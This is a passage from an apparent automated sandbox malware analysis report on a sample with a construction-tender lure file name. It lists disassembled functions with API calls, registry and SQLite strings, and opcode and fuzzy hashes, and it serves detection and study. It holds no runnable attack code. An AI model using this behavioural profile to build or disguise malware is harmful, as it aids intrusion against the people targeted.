                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: gj
                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                          Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                          • API String ID: 3510742995-2446657581
                                                                                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                          Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4281309102-0
                                                                                                                          • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                          • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                          Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfwcscat
                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                          • API String ID: 384018552-4153097237
                                                                                                                          • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                          • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                          • String ID: 0$6
                                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                                          • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                          • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                                          • String ID: 6$\
                                                                                                                          • API String ID: 404372293-1284684873
                                                                                                                          • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                          • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1331804452-0
                                                                                                                          • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                          • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                          Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                          • String ID: advapi32.dll
                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                          • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                          • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                          • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                          • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                          • String ID: %2.2X
                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                          • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                          • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                          • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                          • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                          Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • strlen.MSVCRT ref: 00408DFA
                                                                                                                            • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                          • memset.MSVCRT ref: 00408E46
                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2350177629-0
                                                                                                                          • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                          • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                          Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                          • API String ID: 2221118986-1606337402
                                                                                                                          • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                          • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                          Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                          • memset.MSVCRT ref: 00408FD4
                                                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                          • memset.MSVCRT ref: 00409042
                                                                                                                          • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                            • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 265355444-0
                                                                                                                          • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                          • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                          Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4131475296-0
                                                                                                                          • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                          • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004116FF
